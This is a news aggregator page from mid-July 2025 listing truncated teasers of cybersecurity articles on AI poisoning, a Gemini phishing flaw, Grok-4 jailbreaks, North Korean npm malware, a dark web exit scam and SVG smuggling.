Source: www.csoonline.com – Author: The CISO’s role has always been to protect the organization from threats it does not yet understand. AI poisoning requires CISOs to rethink risk, architecture, relationships, and shared responsibility. In May 2025, the NSA, CISA, and FBI issued a joint bulletin authored   show more ...

with the cooperation of the governments of Australia, New […] La entrada AI poisoning and the CISO’s crisis of trust – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: Gathering threat intelligence, finding the perpetrators of cyber attacks and bringing down whole ransomware gangs are some of the ways the dark web is used for by defenders. The term “dark web” may paint a picture in our head of threat actors lurking underground, on the   show more ...

shrouded parts of the internet […] La entrada How defenders use the dark web – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: Ein Bug in Google Gemini erlaubt es Angreifern, E-Mail-Zusammenfassungen zu kapern und Phishing-Attacken zu starten. Hacker können Google Gemini nutzen, um versteckte Phishing-Attacken durchzuführen. Sadi-Santos – shutterstock.com Google Gemini für Workspace kann   show more ...

missbraucht werden, um E-Mail-Zusammenfassungen zu generieren, die legitim erscheinen, aber bösartige Anweisungen oder Warnungen enthalten. Das Problem: Angreifer können […] La entrada Google Gemini-Lücke ermöglicht versteckte Phishing-Angriffe – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: In practice, incident response teams repeatedly encounter the same weaknesses. What are they and how can they be resolved? Encrypted files and a text file containing a ransom note clearly indicate that a company has fallen victim to a cyberattack. But this is only the end of   show more ...

a long chain of […] La entrada The 10 most common IT security mistakes – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.csoonline.com – Author: Just days after launch, Elon Musk’s Grok-4 is compromised by researchers using a stealthy blend of Echo Chamber and Crescendo techniques, exposing deep flaws in AI safety systems. xAI’s newly launched Grok-4 is already showing cracks in its defenses, falling to recently   show more ...

revealed multi-conversational, suggestive jailbreak techniques. Two days after Elon […] La entrada New Grok-4 AI breached within 48 hours using ‘whispered’ jailbreaks – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing another set of 67 malicious packages to the npm registry, underscoring ongoing attempts to poison the open-source ecosystem via software supply chain attacks. The   show more ...

packages, per Socket, have attracted more than 17,000 downloads, and incorporate […] La entrada North Korean Hackers Flood npm Registry with XORIndex Malware in Ongoing Attack Campaign – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Abacus

Source: www.infosecurity-magazine.com – Author: The Western world’s highest-grossing dark web marketplace went offline earlier this month in a likely exit scam, according to industry experts. Blockchain intelligence firm TRM Labs said that users of Abacus Market began reporting withdrawal issues in late June.   show more ...

This is a common precursor to an exit scam, which takes place […] La entrada Abacus Market Shutters After Exit Scam, Say Experts – Source: www.infosecurity-magazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.infosecurity-magazine.com – Author: The UK’s National Cyber Security Centre (NCSC) has launched a new initiative designed to enhance its understanding of vulnerability research and improve the sharing of best practices among the external cybersecurity community. Announced yesterday, the   show more ...

Vulnerability Research Institute (VRI) will help the NCSC to better understand: Vulnerabilities present in specific products […] La entrada NCSC Launches Vulnerability Research Institute to Boost UK Resilience – Source: www.infosecurity-magazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: levelblue.com – Author: hello@alienvault.com. Let’s face it—cybersecurity is no longer a game of building taller walls or thicker locks. The old rules, the ones based on the idea that threats come only from outside, just don’t hold up anymore. In today’s digital world, where employees connect   show more ...

from anywhere, apps live in the cloud, and […] La entrada Why Zero Trust Is Essential for Effective Cybersecurity – Source:levelblue.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: Deeba Ahmed. A new form of cyberattack is on the rise, with hackers now using seemingly harmless Scalable Vector Graphics (SVG) image files to sneak malicious code past traditional defences, reveals the latest research from the Ontinue Advanced Threat Operations team. This   show more ...

technique, dubbed “SVG Smuggling” by researchers, weaponises these typically […] La entrada Attackers Hide JavaScript in SVG Images to Lure Users to Malicious Sites – Source:hackread.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: Waqas. UK pet owners are being hit with convincing scam emails demanding microchip registration renewals, and the source of the problem appears to lie deeper than just spam. A recent investigation by Pen Test Partners has revealed serious security issues in how microchip data is   show more ...

stored and accessed, giving scammers the […] La entrada UK Pet Owners Targeted by Fake Microchip Renewal Scams – Source:hackread.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: CyberNewswire. Paris, France, July 15th, 2025, CyberNewsWire GitGuardian, the leader in automated secrets detection and remediation, today announced the launch of its Model Context Protocol (MCP) Server, a powerful new infrastructure designed to bring AI-assisted secrets security   show more ...

directly into developer environments. As intelligent agents begin to reshape the software development landscape, […] La entrada GitGuardian Launches MCP Server to Bring Secrets Security into Developer Workflows – Source:hackread.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: Owais Sultan. Meme coins started as internet jokes, but by 2025, they’ve become one of the most volatile and talked-about parts of the crypto world. Once dismissed as unserious, these tokens now account for a major part of trading activity. According to analytics from CoinGecko   show more ...

and LunarCrush, meme coins made up […] La entrada Meme Coins in 2025: High Risk, High Reward, and Rising Security Threats – Source:hackread.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2025-07
Aggregator history
Tuesday, July 15
TUE
WED
THU
FRI
SAT
SUN
MON
JulyAugustSeptember